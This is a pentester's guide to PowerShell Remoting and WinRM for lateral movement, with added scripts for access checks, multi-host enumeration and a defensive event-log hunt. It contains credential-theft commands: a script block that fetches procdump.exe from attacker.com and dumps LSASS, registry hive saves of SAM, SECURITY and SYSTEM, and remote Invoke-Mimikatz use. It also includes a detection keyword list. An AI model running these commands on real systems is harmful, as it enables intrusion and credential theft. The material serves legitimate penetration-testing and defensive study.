PowerShell Remoting for Pentesters
Introduction
PowerShell Remoting is like RDP without the GUI: it lets administrators (and attackers) run commands on remote systems over the network through the WinRM service. With valid credentials and the right group membership on the target, it becomes a native post-exploitation channel that needs no implants and no third-party agents. "Stealthy" is relative, though: it blends in because administrators use the same tool, but it is far from silent, as the logging section at the end shows.
This guide breaks down what PowerShell Remoting is, how it works, how to enable it, and how to abuse it during a penetration test.
1. What Is PowerShell Remoting?
PowerShell Remoting uses the Windows Remote Management (WinRM) service to create an interactive PowerShell session with a remote system. This allows you to:
- Run single commands (Invoke-Command)
- Launch a full interactive shell (Enter-PSSession)
- Execute scripts or collect data from many systems simultaneously
Default Ports:
- 5985: HTTP listener. The transport is plaintext, but the SOAP payload is still encrypted by the negotiated authentication protocol (Kerberos or NTLM message-level encryption). Only Basic authentication, which both client and server must explicitly permit with AllowUnencrypted, puts credentials and commands on the wire in the clear.
- 5986: HTTPS listener (TLS). It needs a server certificate, so in practice it is far less common than 5985.
2. Enabling PowerShell Remoting
Run this locally on the target as an administrator. It is already on by default on Windows Server 2012 R2 and later; Windows client editions ship with it off:
Enable-PSRemoting -Force
# Starts the WinRM service, creates the HTTP listener on 5985 and enables the matching firewall rule
# On a client OS whose active network profile is Public it refuses to run unless you add -SkipNetworkProfileCheck
Enable-PSRemoting only configures the machine it runs on. If you have admin rights over SMB but not WinRM, the usual move is to run it through another channel such as PsExec first.
3. Starting a Remote Session
Interactive Shell:
Enter-PSSession -ComputerName 192.168.56.101 -Credential corp\administrator
# Prompts for the password, then opens a shell on the remote machine; the prompt changes to [192.168.56.101]: PS ...
Non-Interactive Commands:
Invoke-Command -ComputerName 192.168.56.101 -ScriptBlock { Get-LocalUser } -Credential corp\administrator
# Runs the script block remotely and returns the output as deserialized objects
Two prerequisites apply to both. The account must be a member of the target's local Administrators or Remote Management Users group. And connecting by IP address (or to a machine outside the domain) forces NTLM instead of Kerberos, which the client refuses unless the target is in your TrustedHosts list or you connect over HTTPS with -UseSSL.
4. Checking if a System Supports Remoting
Use Test-WSMan:
Test-WSMan 192.168.56.101
# Sends an unauthenticated Identify request; a reply (ProductVendor, ProductVersion, protocol version) means WinRM is listening and reachable
# Add -Credential and -Authentication Negotiate to confirm that your account is actually allowed to connect, not just that the service answers
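The checks from the last two sections, combined into one attacker-side pre-flight script. This is an added example and not code from the original post. The IP address, account and password are placeholders; it assumes a Windows attacking host with PowerShell 5.1, run as a local administrator (needed to edit TrustedHosts), and that you are connecting by IP, which forces NTLM and therefore the TrustedHosts step.

```powershell
# Added example (not from the original post). Target, account and password are placeholders.
$Target = '192.168.56.101'
$Cred   = New-Object System.Management.Automation.PSCredential(
              'corp\administrator',
              (ConvertTo-SecureString 'Password123' -AsPlainText -Force))

# 1. Is the WinRM HTTP port open at all? (5986 would be the HTTPS listener)
$tcp = Test-NetConnection -ComputerName $Target -Port 5985 -WarningAction SilentlyContinue
if (-not $tcp.TcpTestSucceeded) { throw "WinRM port 5985 is closed or filtered on $Target" }

# 2. Unauthenticated Identify request: proves the WinRM service answers and reports the stack version.
Test-WSMan -ComputerName $Target

# 3. Connecting by IP means Kerberos cannot be used, so the client falls back to NTLM and
#    refuses unless the target is in TrustedHosts (or HTTPS is used). Append, do not overwrite.
$trusted = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
if ($trusted -notmatch [regex]::Escape($Target)) {
    $new = if ($trusted) { "$trusted,$Target" } else { $Target }
    Set-Item WSMan:\localhost\Client\TrustedHosts -Value $new -Force
}

# 4. Authenticated check: with -Credential, Test-WSMan actually logs on, so success means the
#    account is permitted to use the endpoint (local Administrators or Remote Management Users).
Test-WSMan -ComputerName $Target -Credential $Cred -Authentication Negotiate

# 5. Run something non-interactive and keep the result as an object rather than text.
$info = Invoke-Command -ComputerName $Target -Credential $Cred -ScriptBlock {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    [pscustomobject]@{
        Host        = $env:COMPUTERNAME
        User        = $id.Name
        # A remoting logon for a local admin gets a full (non-filtered) token, so this is normally True
        IsAdmin     = ([Security.Principal.WindowsPrincipal]$id).IsInRole(
                          [Security.Principal.WindowsBuiltInRole]::Administrator)
        LocalAdmins = (Get-LocalGroupMember -Group Administrators).Name -join ';'
    }
}
$info | Format-List
```

Step 4 is the one most guides skip: an Identify reply only says WinRM is up, while the authenticated Test-WSMan tells you whether this account is allowed through the default session configuration before you start a session and leave a failed-logon trail.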
5. Abuse Scenario: Local Admin to Lateral Movement
Let’s say you’ve compromised a low-privileged domain user and found that their credentials are valid on another machine where they’re a local admin.
Step 1: Use CrackMapExec to Confirm Access
crackmapexec smb 10.0.0.10 -u svc_admin -p Password123 -d corp
# Look for Pwn3d! to confirm local admin. The smb module only tells you the account is an admin, not that WinRM is open;
# crackmapexec's winrm protocol runs the same check over 5985 and prints Pwn3d! when it actually gets a shell
Step 2: Use PowerShell Remoting to Pivot
Enter-PSSession -ComputerName 10.0.0.10 -Credential corp\svc_admin
# Use the shell to dump credentials or look for logged-on users whose tickets are on this box
Keep the double-hop problem in mind: a remoting logon is a network logon (type 3), so your own password or ticket is not cached on 10.0.0.10. Anything you run there that needs to authenticate onward (a file share, another Invoke-Command, an AD query) will fail unless you pass explicit credentials or delegation such as CredSSP is configured.
If you would rather not leave an interactive session open, run one-shot script blocks instead. Note that a function you loaded locally is not visible in the remote runspace, so the tooling has to be loaded on the far side first:
$s = New-PSSession -ComputerName 10.0.0.10 -Credential corp\svc_admin
Invoke-Command -Session $s -FilePath .\Invoke-Mimikatz.ps1     # defines the function inside the session
Invoke-Command -Session $s -ScriptBlock {
Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords'
}
# PowerSploit's Invoke-Mimikatz also has its own -ComputerName parameter that does this wrapping for you.
# Do not mistake this for stealth: loading Mimikatz into memory is exactly what AMSI and EDR look for, and
# script block logging (event 4104) records the whole function body on the target.
Or enumerate the local Administrators group:
Invoke-Command -ComputerName 10.0.0.10 -ScriptBlock {
net localgroup administrators
}
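Section 1 mentions running against many systems at once; the steps above show one host at a time. The following added example (not from the original post) fans the same enumeration out to a list of hosts in one Invoke-Command, keeps the successes as objects tagged with PSComputerName, and separates out the hosts that refused the credential or had WinRM closed. The target list, account and password are constructed placeholders.

```powershell
# Added example (not from the original post). Targets and credentials are placeholders.
$Cred    = New-Object System.Management.Automation.PSCredential(
               'corp\svc_admin', (ConvertTo-SecureString 'Password123' -AsPlainText -Force))
$Targets = '10.0.0.10', '10.0.0.11', '10.0.0.12'     # constructed target list

# -ErrorAction SilentlyContinue plus -ErrorVariable collects per-host failures (access denied,
# port closed, timeout) instead of aborting the run; -ThrottleLimit caps concurrent sessions.
$results = Invoke-Command -ComputerName $Targets -Credential $Cred -ThrottleLimit 16 `
    -ErrorAction SilentlyContinue -ErrorVariable failures -ScriptBlock {
        # Everything in this block runs on the remote host; output is serialised back to the caller.
        $id    = [Security.Principal.WindowsIdentity]::GetCurrent()
        $admin = ([Security.Principal.WindowsPrincipal]$id).IsInRole(
                     [Security.Principal.WindowsBuiltInRole]::Administrator)

        # Local Administrators: strip net.exe's header/footer lines, keep member names only
        $admins = net localgroup administrators |
            Where-Object { $_ -and $_ -notmatch '^(Alias|Comment|Members|---|The command)' }

        # Interactive sessions: whose tokens and tickets are currently on this box
        $loggedOn = quser 2>$null | Select-Object -Skip 1 | ForEach-Object {
            (($_.Trim() -replace '^>', '') -split '\s+')[0]    # '>' marks the current session
        }

        [pscustomobject]@{
            User         = $id.Name
            IsLocalAdmin = $admin
            LocalAdmins  = $admins -join ';'
            LoggedOn     = $loggedOn -join ';'
        }
    }

"`n[+] Hosts where the credential worked:"
$results | Select-Object PSComputerName, IsLocalAdmin, LoggedOn, LocalAdmins | Format-Table -AutoSize

"`n[-] Hosts that failed:"
foreach ($f in $failures) {
    # OriginInfo names the host; FullyQualifiedErrorId distinguishes AccessDenied from connection errors
    '{0}: {1}' -f $f.OriginInfo.PSComputerName, $f.FullyQualifiedErrorId
}
```

The failure list is as useful as the success list: an AccessDenied on a host where CrackMapExec said Pwn3d! usually means the account is admin but not allowed through the WinRM endpoint, while a connection error means the listener or firewall rule is missing.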
6. Common Post-Exploitation Moves
Here’s what you can do once inside via PowerShell Remoting:
Dump LSASS with Procdump:
Invoke-Command -ComputerName 10.0.0.10 -ScriptBlock {
New-Item -ItemType Directory -Path C:\Temp -Force | Out-Null
Invoke-WebRequest http://attacker.com/procdump.exe -OutFile C:\Temp\procdump.exe
C:\Temp\procdump.exe -accepteula -ma lsass.exe C:\Temp\lsass.dmp
}
# Use full paths: the remote session starts in the user's Documents folder, so .\procdump.exe would not resolve, and
# -accepteula is required the first time Procdump runs non-interactively.
# Retrieve the dump (Copy-Item -FromSession) and parse it offline with mimikatz sekurlsa::minidump or pypykatz; a dump is parsed, not cracked.
# If LSA protection (RunAsPPL) or Credential Guard is enabled, Procdump is denied a handle to lsass and this fails, loudly.
Pull the SAM, SECURITY and SYSTEM Registry Hives:
Invoke-Command -ComputerName 10.0.0.10 -ScriptBlock {
New-Item -ItemType Directory -Path C:\Temp -Force | Out-Null
reg save HKLM\SAM C:\Temp\SAM /y
reg save HKLM\SYSTEM C:\Temp\SYSTEM /y
reg save HKLM\SECURITY C:\Temp\SECURITY /y
}
# SAM holds the local account hashes, SECURITY the LSA secrets and cached domain credentials, and SYSTEM the boot key
# needed to decrypt both. Parse offline with impacket's secretsdump.py (-sam SAM -security SECURITY -system SYSTEM LOCAL).
7. Reusing a PSSession
Instead of authenticating for every command, create a session once and reuse it. A session keeps state between calls (variables, loaded functions, working directory), which is what makes the load-then-call pattern from section 5 work:
$session = New-PSSession -ComputerName 10.0.0.10 -Credential corp\svc_admin
Invoke-Command -Session $session -ScriptBlock { whoami }
# Local variables are not visible inside the script block; pass them in with $using:name or -ArgumentList
Close the session when you are done. An abandoned session stays alive as a wsmprovhost.exe process on the target until its idle timeout expires:
Remove-PSSession $session
8. Detecting and Defending (Blue Team View)
While this is offensive-focused, be aware of the artifacts you leave behind on the target and on the wire:
- Security log: 4624 logon type 3 for the connecting account (Kerberos or NtLmSsp as the logon process), 4648 on your own box whenever -Credential is used, and 4688 process creation where the parent is wsmprovhost.exe, the WinRM plugin host that runs every remote command
- Microsoft-Windows-WinRM/Operational: event 91 when a WSMan shell is created on the server, and authentication events naming the account and whether Kerberos or NTLM was used
- Microsoft-Windows-PowerShell/Operational: 4104 script block logging records the full text of every script block you send (including a loaded Invoke-Mimikatz), and 4103 module logging records pipeline activity when enabled
- Network: TCP 5985/5986 between workstations or from a workstation to many servers is unusual outside admin jump hosts; the HTTP traffic carries the User-Agent "Microsoft WinRM Client"
- Credential theft triggers: handle requests on lsass.exe from Procdump, and reg save of the SAM or SECURITY hives, are standard EDR detections
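A short hunt over those artifacts, as an added example (not from the original post) rather than anything the original author provided. It reads the local event logs for the last 24 hours and pulls out the three signals described above: processes spawned by wsmprovhost.exe, inbound WSMan shell creation, and logged script blocks containing common post-exploitation strings. It must run as an administrator on the host being examined (or with -ComputerName pointed at it); the ParentProcessName field in 4688 exists on Windows 10 / Server 2016 and later, CommandLine only if command-line auditing is on, and 4104 only if script block logging is enabled. The keyword list is a constructed starting point, not a complete signature.

```powershell
# Added example (not from the original post). Run elevated on the suspect host.
$Since = (Get-Date).AddDays(-1)

# 1. Security 4688: anything whose parent is wsmprovhost.exe was launched through PowerShell Remoting.
$children = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $Since } `
                -ErrorAction SilentlyContinue | ForEach-Object {
    $xml = [xml]$_.ToXml()
    $d = @{}
    $xml.Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
    if ($d['ParentProcessName'] -like '*\wsmprovhost.exe') {
        [pscustomobject]@{
            Time        = $_.TimeCreated
            User        = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            Process     = $d['NewProcessName']
            CommandLine = $d['CommandLine']      # empty unless command-line auditing is enabled
        }
    }
}

# 2. WinRM/Operational 91: a WSMan shell was created on this server (the UserId is the connecting account's SID).
$shells = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WinRM/Operational'; Id = 91; StartTime = $Since } `
              -ErrorAction SilentlyContinue |
          Select-Object TimeCreated, @{ n = 'UserSid'; e = { $_.UserId } }, Message

# 3. PowerShell/Operational 4104: script blocks with the usual credential-theft strings. Constructed keyword list.
$pattern = 'sekurlsa|Invoke-Mimikatz|procdump|lsass|reg save|MiniDump|secretsdump'
$blocks = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since } `
              -ErrorAction SilentlyContinue |
          Where-Object { $_.Message -match $pattern } |
          Select-Object TimeCreated, @{ n = 'Snippet'; e = { ($_.Message -split "`n")[1].Trim() } }

"[*] Processes spawned via WinRM: $(@($children).Count)"
$children | Format-Table -AutoSize
"[*] Inbound WSMan shells: $(@($shells).Count)"
$shells   | Format-Table -AutoSize
"[*] Suspicious script blocks: $(@($blocks).Count)"
$blocks   | Format-Table -Wrap
```

Signal 1 is the most reliable of the three because it needs no extra PowerShell logging configuration: on a server that is not an administration target, any process whose parent is wsmprovhost.exe deserves a look.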
Conclusion
PowerShell Remoting is one of the most powerful tools in a pentester's post-exploitation toolkit, and one of the hardest for defenders to distinguish from legitimate administration. If you have credentials and WinRM is open, you are one command away from remote control.
In an Active Directory environment it is not just about privilege escalation. It is about pivoting through the environment with native tooling that blends into normal admin traffic, while knowing exactly which logs you are writing as you go.
